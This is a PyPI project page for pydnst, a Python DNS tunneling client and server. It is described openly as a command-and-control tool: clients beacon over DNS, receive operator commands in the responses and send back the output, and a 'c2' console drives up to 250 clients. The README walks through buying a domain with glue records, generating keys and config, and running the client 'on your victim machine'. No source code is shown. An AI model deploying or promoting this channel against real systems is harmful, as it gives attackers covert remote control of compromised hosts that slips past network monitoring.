Skip to main content

DNS Tunneling client and server

Project description

pydnst

DNS Tunneling client and server in Python

INSTALLATION

pip3 install pydnst

For convenience the client and server are in the same package, however the "rich" dependency is only used by the server.

FEATURES

pydnst is a DNS tunneling implementation in Python, supporting Linux only (the client might require a few paths tweaks to run on Windows).
The client sends keep-alive requests every 30 seconds. If the server has a command to send to a specific client, it sends it in a response to a keep-alive. Then the client sends another query containing the command response.
The server can manage up to 250 clients, communication is encrypted with a unique Fernet key per client, generated on the fly and shared using RSA encryption.
A simple rich interface on the server side enables to send commands to specific clients, and watch the responses in real-time.
The client being implemented in Python is not stealth.

SET UP

First acquire access to a machine with a public IP, this is where the pydnst server will run.
Then acquire a DNS name, as short as possible, and configure its nameservers with glue records pointing to your public IP.
You can then configure your pydnst.toml field DNST_SERVER_NAME, and run pydnst client on your victim machine.

USAGE

###Install the pydnst package on client and server

pip3 install pydnst
python3 -m pydnst --help

###Generate certificates (recommended), to encrypt the shared key transfer between client and server This creates server_private.pem (copy to server) and server_public.pem (copy to client). After copying server_private.pem to server, don't forget to chmod 600.

python3 -m pydnst create_certificates

###Generate configuration This creates pydnst.toml : edit if needed and then copy to client and server.
On client, edit the MAIN_INTERFACE to use the DNS server of this interface, or DNS_SERVER_ADDRESS to circumvent it.
On server, edit the LISTENING_INTERFACE.
On both, specify the DNST_SERVER_NAME (the DNS name purchased).

python3 -m pydnst config

###On server In one terminal, run the server (pydnst.toml must be in the current directory) :
Logs are under pydnst.log

python3 -m pydnst server run

In another terminal, run the commander (pydnst.toml must be in the current directory), which enables to send commands and watch responses in real-time.

python3 -m pydnst server c2

###On client In one terminal, run the client (pydnst.toml must be in the current directory) :
Logs are under pydnst.log

python3 -m pydnst client run

Project details


Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

pydnst-1.0.1.tar.gz (26.0 kB view details)

Uploaded Source

Built Distribution

pydnst-1.0.1-py3-none-any.whl (25.9 kB view details)

Uploaded Python 3

File details

Details for the file pydnst-1.0.1.tar.gz.

File metadata

  • Download URL: pydnst-1.0.1.tar.gz
  • Upload date:
  • Size: 26.0 kB
  • Tags: Source
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/4.0.2 CPython/3.10.6

File hashes

Hashes for pydnst-1.0.1.tar.gz
Algorithm Hash digest
SHA256 fad430ab7403a527d81802e8daf9be0c9aae02bd12f4d40b7c16ef8a0c50ad67
MD5 a05cf7ac469373236dc07e5d7b0645fb
BLAKE2b-256 992559325bc4532decb30db8fea3ddc10a17fc1dbf5daa79d4303e87a2bc2ae4

See more details on using hashes here.

File details

Details for the file pydnst-1.0.1-py3-none-any.whl.

File metadata

  • Download URL: pydnst-1.0.1-py3-none-any.whl
  • Upload date:
  • Size: 25.9 kB
  • Tags: Python 3
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/4.0.2 CPython/3.10.6

File hashes

Hashes for pydnst-1.0.1-py3-none-any.whl
Algorithm Hash digest
SHA256 937c9f23aa78d62eba95e4f50d1e0abca903b7b577a8091e93e9924cd543398c
MD5 533dcf3bb5d0f586c91d2c137dece379
BLAKE2b-256 fe769507ee97515050222186511985239137dcaa7ebc0e0c002b5f5b4ab20ab5

See more details on using hashes here.

Supported by

AWS AWS Cloud computing and Security Sponsor Datadog Datadog Monitoring Fastly Fastly CDN Google Google Download Analytics Microsoft Microsoft PSF Sponsor Pingdom Pingdom Monitoring Sentry Sentry Error logging StatusPage StatusPage Status page